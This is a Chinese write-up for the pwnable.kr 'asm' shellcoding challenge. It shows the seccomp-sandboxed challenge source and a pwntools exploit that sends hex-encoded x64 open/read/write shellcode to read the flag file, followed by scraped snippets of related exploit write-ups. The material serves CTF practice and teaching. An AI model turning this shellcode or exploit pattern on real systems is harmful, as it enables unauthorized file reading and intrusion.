【pwnable】asm之write up

首先查看源代码：

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>

#define LENGTH 128

void sandbox(){
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
    if (ctx == NULL) {
        printf("seccomp error\n");
        exit(0);
    }

    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);

    if (seccomp_load(ctx) < 0){
        seccomp_release(ctx);
        printf("seccomp error\n");
        exit(0);
    }
    seccomp_release(ctx);
}

char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];
int main(int argc, char* argv[]){

    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stdin, 0, _IOLBF, 0);

    printf("Welcome to shellcoding practice challenge.\n");
    printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
    printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
    printf("If this does not challenge you. you should play ‘asg‘ challenge :)\n");

    char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
    memset(sh, 0x90, 0x1000);
    memcpy(sh, stub, strlen(stub));

    int offset = sizeof(stub);
    printf("give me your x64 shellcode: ");
    read(0, sh+offset, 1000);

    alarm(10);
    chroot("/home/asm_pwn");    // you are in chroot jail. so you can‘t use symlink in /tmp
    sandbox();
    ((void (*)(void))sh)();
    return 0;
}

题目中给出了提示：

连接到本地的9026端口，asm正在执行，之后便可拿到flag，而flag所在文件为：

this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong

所以exp如下：

from pwn import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
filename=‘this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong\0‘
con = ssh(host=‘pwnable.kr‘, user=‘asm‘, password=‘guest‘, port=2222)
p = con.connect_remote(‘localhost‘, 9026)#cn = process(‘./asm‘)
p.recvuntil(‘shellcode: ‘)

pay = ‘31c031ff31d2b601be0101010181f6014640400f056a0258bf0101010181f70146404031d2b60431f60f054889c731c031d2b602be0101010181f6014940400f056a01586a015f31d2b603be0101010181f6014940400f05‘.decode(‘hex‘)

p.send(pay)
p.send(filename)
print p.recvuntil(‘\x90‘)

得到结果如下：

时间： 2024-08-20 08:05:48

【pwnable】asm之write up的相关文章

【pwnable.kr】 asm

一道写shellcode的题目, #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h> #define LENGTH 128 void sa

【pwnable.kr】leg

pwnable从入门到放弃第八题. Download : http://pwnable.kr/bin/leg.cDownload : http://pwnable.kr/bin/leg.asm ssh [email protected] -p2222 (pw:guest) 先下载这两个文件:leg.c #include <stdio.h> #include <fcntl.h> int key1(){ asm("mov r3, pc\n"); } int key2

【PWN】pwnable.kr echo1 writeup

#Exploit for [email protected] #@Windcarp 2015.07.23 from pwn import * #init context(arch = 'amd64', os = 'linux') local=False if local: p = process("./echo1") libc = ELF("/lib/x86_64-linux-gnu/libc-2.19.so") else: p = remote("pwn

pwnable.kr-echo1-Writeup

pwnable的echo1,一个栈溢出的漏洞,同样以后再补上分析过程和思路,先放exp 1 #!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 __Auther__ = 'M4x' 4 5 from pwn import * 6 context.arch = 'amd64' 7 context.os = 'linux' 8 context.log_level = 'debug' 9 10 elf = ELF('./echo1') 11 id_add

ORACLE11g R2【RAC+ASM→单实例FS】

ORACLE11g R2[RAC+ASM→单实例FS] 11g R2 RAC+ASMà单实例FS的DG,建议禁用OMF. 本演示案例所用环境: primary standby OS Hostname node1,node2 std OS Version RHEL6.5 RHEL6.5 DB Version 11.2.0.4 11.2.0.4 db_name stephen stephen db_unique_name stephen standby service_names stephen

GCC在C语言中内嵌汇编 asm volatile 【转】

转自:http://blog.csdn.net/pbymw8iwm/article/details/8227839 在内嵌汇编中,可以将C语言表达式指定为汇编指令的操作数,而且不用去管如何将C语言表达式的值读入哪个寄存器,以及如何将计算结果写回C 变量,你只要告诉程序中C语言表达式与汇编指令操作数之间的对应关系即可, GCC会自动插入代码完成必要的操作. 1.简单的内嵌汇编例: __asm__ __volatile__("hlt"); "__asm__"表示后面的

《linux 内核全然剖析》 include/asm/io.h

include/asm/io.h #define outb(value,port) __asm__ ("outb %%al,%%dx"::"a" (value),"d" (port)) //宏定义outb用汇编实现了在端口地址port处写入值value //使用的寄存器是al,一个byte长度,而端口port使用的是2byte长度地址来标记的寄存器,注意这里寄存器的使用 #define inb(port) ({ unsigned char _v;

ASM到ARM迁移（二）

在一中讨论了通过Azure平台的工具进行迁移的方案. 本文将讨论另外一种迁移方式.通过磁盘复制的方式,把部分VM迁移到ARM的Managed Disk模式. 一. 获得ASM中Disk的信息在管理界面上,获取VM的Disk信息二. 通过这个Disk的URL,创建Managed Disk [email protected]:~# az disk create -g hwfdsk -n hwmd01 --source https://h2portalvhdsn6t2ktgjscst.blob

CRS和ASM有啥关系

CRS和ASM没有关系 CRS是Oracle 10gR1 RAC后推出了自身的集群软件,这个软件的名称叫做Oracle Cluster Ready Service(Oracle集群就绪服务),简称CRS ASM是Oracle 10g R2后为了简化Oracle数据库的管理而推出来的一项新功能,这是Oracle自己提供的卷管理器,主要用于替代操作系统所提供的LVM,它不仅支持单实例,同时对RAC的支持也是非常好.ASM可以自动管理磁盘组并提供有效的数据冗余功能. 总上所述,CRS是一个集群软件,只